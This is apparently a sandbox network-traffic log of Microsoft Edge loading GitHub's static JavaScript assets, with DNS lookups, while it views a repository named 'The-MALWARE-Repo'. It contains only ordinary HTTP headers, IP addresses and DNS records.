x-served-by: cache-iad-kiad7000037-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 8027
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0bf222b2951c98285c7704d7a491fa1bd16cd37e
content-length: 5011
GET

https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-4f6b14c4cf9a.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_ui-commands_ui-commands_ts-4f6b14c4cf9a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 15:02:46 GMT
etag: "0x8DCE4859B2A8E52"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 85382
x-served-by: cache-iad-kjyo7100100-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 26, 2834
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3a10b36784ee43b0baa91098364a95b60f7df029
content-length: 7343
GET

https://github.githubassets.com/assets/keyboard-shortcuts-dialog-0a7cffcc5a1e.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/keyboard-shortcuts-dialog-0a7cffcc5a1e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 11:23:46 GMT
etag: "0x8DCE46703238FD8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 89120
x-served-by: cache-iad-kjyo7100049-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 10, 3590
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 578c87ddd15a2386d01e5407dd6e704981605e3d
content-length: 5639
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 27 Aug 2024 19:34:29 GMT
etag: "0x8DCC6CF44B47E8C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3193279
x-served-by: cache-iad-kiad7000103-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 7130, 26052
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d56f339b5d3a0276a03b1235440ca94e20d3e716
content-length: 4081
GET

https://github.githubassets.com/assets/sessions-f3ddee0032e4.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/sessions-f3ddee0032e4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A13028DA"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2573085
x-served-by: cache-iad-kcgs7200022-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 10532, 25886
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 06e7f4bf684551bf383ac2794a20fda52f8a8eec
content-length: 5219
GET

https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-90c1b002fec5.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-app_components_primer_experimental_select-panel-element_ts-90c1b002fec5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 13 Sep 2024 14:50:54 GMT
etag: "0x8DCD40378515B21"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 894124
x-served-by: cache-iad-kiad7000070-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 30599
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 929582ebdc4d9e6ccf5a76e1de5d4c814e5092ee
content-length: 7652
GET

https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-1077a1578034.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-1077a1578034.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:45:58 GMT
etag: "0x8DCE3127461225B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 181518
x-served-by: cache-iad-kiad7000050-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 8, 7062
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: de7250229b602885f5511ccb73e7c2297381f794
content-length: 5385
GET

https://github.githubassets.com/assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-a18fad-9a094f77afd1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-a18fad-9a094f77afd1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 05 Aug 2024 19:46:34 GMT
etag: 0x8DCB58750224B38
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 3451622
x-served-by: cache-iad-kjyo7100141-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 40, 27529
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 40f992fc1007198e5b2677f7ec7971c3c8d49257
content-length: 543
GET

https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-1546dc8c42cb.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_query-builder-element_query-builder-element_ts-1546dc8c42cb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 16:52:03 GMT
etag: "0x8DCDD8261DAD362"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 846232
x-served-by: cache-iad-kjyo7100044-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 29, 28403
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 29efc0b39f24d01ea2edee0f71ecf5bc1ca35eed
content-length: 6212
GET

https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-27b18f5e26b6.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-27b18f5e26b6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 13:06:43 GMT
etag: "0x8DCE3AC3A3E04F7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 181518
x-served-by: cache-iad-kiad7000027-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 8, 7048
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ba869bab17050b6b65bf2e92f4fd0ec9bd9118a7
content-length: 20388
GET

https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-ui_packages_trusted-types-policies_policy_ts--7cc11e-7e08c316f09f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-app_components_search_qbsearch-input-element_ts-ui_packages_trusted-types-policies_policy_ts--7cc11e-7e08c316f09f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 24 Sep 2024 07:23:05 GMT
etag: "0x8DCDC69BBBBD3ED"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 977048
x-served-by: cache-iad-kjyo7100098-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 5, 31282
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c6a6a1b1c583d8131825f0c685077456fb60c361
content-length: 7672
GET

https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-28d1a6bc19ca.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-28d1a6bc19ca.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 15:15:32 GMT
etag: "0x8DCE3BE39615B1F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 85393
x-served-by: cache-iad-kjyo7100111-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 32, 3046
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4712891fab1134c6722cf676a3c83527e0e6816b
content-length: 2888
GET

https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-331bb20ac2eb.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-331bb20ac2eb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 15:15:32 GMT
etag: "0x8DCE3BE396306EE"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 85393
x-served-by: cache-iad-kjyo7100026-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 32, 3006
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4822ee8b88985b5bcebdd4867471acb4b0844427
content-length: 3123
GET

https://github.githubassets.com/assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-600f89-7a5d1736c364.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-600f89-7a5d1736c364.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 16:52:03 GMT
etag: "0x8DCDD8261DA8595"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 846232
x-served-by: cache-iad-kcgs7200020-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 29, 28310
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 09f9e867925a6de4bb054e477b71980f053efcc1
content-length: 5592
GET

https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-eba7ee3409f2.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-eba7ee3409f2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
content-md5: VvBwy4NqnxK52DsiAv8DSA==
last-modified: Wed, 14 Aug 2024 19:54:00 GMT
etag: "0x8DCBC9AD72D85A2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 2194514
x-served-by: cache-iad-kcgs7200147-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 2405, 27441
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cc85554e715ecfc3fbbb7a947e15a4db21ddefe7
content-length: 2790
GET

https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-1a3a07f835f6.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-1a3a07f835f6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 11:57:54 GMT
etag: "0x8DCE46BC8207884"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 89105
x-served-by: cache-iad-kiad7000145-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 16, 1928
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8653d90f90410432554fe0dda89a9c21f0973fd1
content-length: 5055
GET

https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-d06d275cbddc.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-d06d275cbddc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
content-md5: Sl55SYaMImCtL5+l+k36Gw==
last-modified: Wed, 14 Aug 2024 19:53:22 GMT
etag: "0x8DCBC9AC0F88440"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:05 GMT
age: 2780586
x-served-by: cache-iad-kcgs7200110-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 13427, 26936
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0eda84123a5b114d3d1eadadf804071c24d7aa5e
content-length: 9412
DNS

github-cloud.s3.amazonaws.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github-cloud.s3.amazonaws.com

IN A

Response

github-cloud.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

52.216.136.107

s3-w.us-east-1.amazonaws.com

IN A

3.5.1.162

s3-w.us-east-1.amazonaws.com

IN A

54.231.160.193

s3-w.us-east-1.amazonaws.com

IN A

52.216.205.3

s3-w.us-east-1.amazonaws.com

IN A

3.5.29.180

s3-w.us-east-1.amazonaws.com

IN A

16.15.176.142

s3-w.us-east-1.amazonaws.com

IN A

3.5.29.128

s3-w.us-east-1.amazonaws.com

IN A

52.217.84.220
DNS

github-cloud.s3.amazonaws.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github-cloud.s3.amazonaws.com

IN A

Response

github-cloud.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

52.216.241.4

s3-w.us-east-1.amazonaws.com

IN A

54.231.234.41

s3-w.us-east-1.amazonaws.com

IN A

52.217.226.25

s3-w.us-east-1.amazonaws.com

IN A

3.5.27.221

s3-w.us-east-1.amazonaws.com

IN A

16.15.194.197

s3-w.us-east-1.amazonaws.com

IN A

52.217.232.49

s3-w.us-east-1.amazonaws.com

IN A

3.5.27.236

s3-w.us-east-1.amazonaws.com

IN A

54.231.203.177
DNS

user-images.githubusercontent.com

msedge.exe

Remote address:

8.8.8.8:53

Request

user-images.githubusercontent.com

IN A

Response

user-images.githubusercontent.com

IN A

185.199.111.133

user-images.githubusercontent.com

IN A

185.199.109.133

user-images.githubusercontent.com

IN A

185.199.110.133

user-images.githubusercontent.com

IN A

185.199.108.133
DNS

user-images.githubusercontent.com

msedge.exe

Remote address:

8.8.8.8:53

Request

user-images.githubusercontent.com

IN A

Response

user-images.githubusercontent.com

IN A

185.199.110.133

user-images.githubusercontent.com

IN A

185.199.109.133

user-images.githubusercontent.com

IN A

185.199.111.133

user-images.githubusercontent.com

IN A

185.199.108.133
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

154.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.111.199.185.in-addr.arpa

IN PTR

Response

154.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-154githubcom
DNS

154.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.111.199.185.in-addr.arpa

IN PTR

Response

154.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-154githubcom
DNS

collector.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

collector.github.com

IN A

Response

collector.github.com

IN CNAME

glb-db52c2cf8be544.github.com

glb-db52c2cf8be544.github.com

IN A

140.82.112.21
DNS

collector.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

collector.github.com

IN A

Response

collector.github.com

IN CNAME

glb-db52c2cf8be544.github.com

glb-db52c2cf8be544.github.com

IN A

140.82.113.22
GET

https://github.githubassets.com/favicons/favicon.svg

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /favicons/favicon.svg HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
